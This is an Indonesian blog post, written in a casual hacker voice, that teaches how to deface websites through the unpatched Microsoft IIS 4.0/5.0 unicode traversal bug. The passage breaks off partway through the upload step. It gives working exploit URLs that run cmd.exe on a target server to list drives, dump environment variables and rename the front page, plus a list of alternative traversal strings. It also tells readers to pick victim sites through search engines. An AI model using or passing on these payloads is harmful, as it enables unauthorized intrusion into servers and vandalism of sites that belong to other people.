Deface mang

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface…heheheh. Banyak yang bertanya “gimana sich nge-deface situs?” seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu “maha guru” dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan “pak-tani” (master..paLa loE lONjoNG..!!) heheheeh… ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
————————————————————-

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Sayah tidak akan menjelaskan panjang lebar mengenai “unicode bug” ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau …ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK…mari kita mulai…Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)…key nya terserah kowe…..Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0…Kita scan terlebih dahulu di http://www.netcraft.com……dapat site yah..??…Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 …Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc….coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee…contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR …
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
http://www.targethost.com tadi ada kemungkinan untuk bisa kita deface…

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu “http://www.targethost.com”
• Bagian exploit string, yaitu “/scripts/..%255c..%255c”
• Bagian folder, yaitu “/winnt/system32/”
• Bagian command, yaitu “cmd.exe?/c+dir+c:\”

Kita lihat pada bagian command diatas menunjukkan perintah “dir c:\” yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti “dir d:\”
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda “+”. Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah “ipconfig.exe /all”

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
– /cgi-bin/..%255c..%255c
– /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
– /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss …hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran….(yg sabar yah nak nyari targetnyah…ehehhehehe).

Lanjuttt……udeh dapet site yg bug unicodenyah gak di patch..??….Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??…
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah…gak ada yahh ..??…coba deh koe ripresh lagehh…udah ketemuuu…nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah…..Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot….Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa….isinyah banyak banged yahh…..mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh….hemm santeyy…oiyahh…lupa sayah…Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah…..
truss kita cari dokumen web itu disitu utk kita RENAME….gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy…coba skrg koe buka site aslinyah di laen window….
http://www.targethost.com == neh yg ini……di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME….misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah…nah coba masukin salah satu dokumen web itu di site asli nyah…
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+
Diposkan oleh ..::cr4wl3r::.. di 09:14